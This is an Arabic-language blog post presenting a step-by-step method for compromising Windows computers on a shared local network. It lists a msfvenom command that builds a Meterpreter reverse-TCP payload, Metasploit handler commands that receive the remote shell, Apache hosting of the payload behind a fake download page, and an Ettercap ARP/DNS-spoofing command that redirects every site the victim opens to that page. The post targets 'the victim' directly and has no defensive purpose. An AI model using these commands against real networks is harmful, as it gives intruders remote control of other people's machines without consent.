خفايا الأنترنت  خفايا الأنترنت

آخر الأخبار

جاري التحميل ...

أخنراق أنظمة الويندوز المتصلة معك على الشبكة!


السلام عليكم ورحمة الله وبركاته
في هذه التدوينة سوف اشرح لكم طريقة أختراق أنظمة الويندوز بحقن صفحة في في متصفح الضحية باستخدام اداة Ettercap .

اول شي نعمل بايلود لاختراق الويندوز باستخدام اداة msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT X > /root/Desktop/payload.exe



بعدين يجب ان تقوم بعمل صفحة مثل بحيث عندما يضغط الضحية على زر ال Button رح تحمل البايلود لي عملته من الوكل هوست على جهازه او فيك تستخدم الصفحة التي قمت بعملها ويمكنك تحميلها من اسفل التدوينة.


ثم تقوم بنقل الصفحة و البايلود الى السيرفر ال apache  ونشغله بكتاية الامر  service apache2 start 
ثم نقوم بفتح الميتا سبلويت لنقوم بتجهيزها لتقوم لاختراق الجهاز عند تشغيل البرنامج.
وبعد فتحها نقوم بوضع هذه الاوامر فيها.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT YOUE_PORT
exploit



الان سوف نقوم بتثبيت هذه الصفحة على متصفح الضحية يعني اي موقع يفتحه الضحية رح تطلع له هي الصفحة باستخدام اداة Ettercap.
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1//
ملاحظة : اذا كنت متصل عن طريق كبل من الراوتر استبدل  wlan0  بي eth0.


والان عندما يفتح الضحية اي موقع سوف تطلع له الصفحة لي عملنها
وبس يضغط على زر التحميل رح يتحمل البرنامج الى جهازه وبس يضغط عليه رح تحصل على meterpreter.
وهكذا قد يكون انتهى شرحنا

ملاحظة :
YOUT_IP = الايبي الخاص بك الداخلي
YOUR_PORT = البورت لي تستخدمه
وايضا لن تحتاج لفتح بورت في الايبي الداخلي لانه رح تلاقيه مفتوح دائما 


لتحميل الصفحة اضغط هنا

عن الكاتب

Security Syria صهيب ناصري مدون جزائري أبلغ من العمر 21 سنة أحب مشاركة أفكاري على الانترنت متخصص في مجال التقنية و أمن المعلومات أهدف الى إثراء المحتوى العربي بالمحتوى الحصري فقط!

التعليقات


اتصل بنا

إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

جميع الحقوق محفوظة

خفايا الأنترنت

كل عام والأمة الأسلامية بخير

رمضان كريم